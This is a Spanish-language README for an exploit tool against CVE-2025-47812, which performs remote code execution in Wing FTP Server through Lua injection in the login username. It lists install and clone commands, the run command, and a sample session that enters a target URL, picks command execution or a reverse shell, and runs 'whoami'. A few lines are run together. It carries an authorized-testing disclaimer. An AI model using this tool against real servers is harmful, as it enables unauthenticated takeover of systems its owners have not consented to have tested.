
Wing FTP Server RCE mediante inyección Lua
Este exploit aprovecha una vulnerabilidad de inyección de Lua en el manejador de inicio de sesión (loginok.html) de Wing FTP Server para ejecutar comandos arbitrarios del sistema operativo u obtener una reverse shell. Abusa de la ejecución de código Lua sin sanitizar a través del parámetro username.
pip3Instale los paquetes requeridos con:
pip3 install -r requirements.txt
O manualmente:
pip3 install requests colorama
git clone https://github.com/0xgh057r3c0n/CVE-2025-47812.git
cd CVE-2025-47812
python3 CVE-2025-47812.py
Ejecute el script:
python3 CVE-2025-47812.py
whoami, id)URL objetivo (ej., http://localhost:5466): http://192.168.1.100:5466
Nombre de usuario (ej., anonymous): anonymous
Su elección (1 o 2): 1
Comando a ejecutar (por defecto: whoami): whoami
Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. Usted es responsable de sus acciones. Úsela solo en sistemas de su propiedad o para los que tenga autorización para realizar pruebas.
Este proyecto está bajo la licencia MIT. Consulte el archivo LICENSE para más detalles.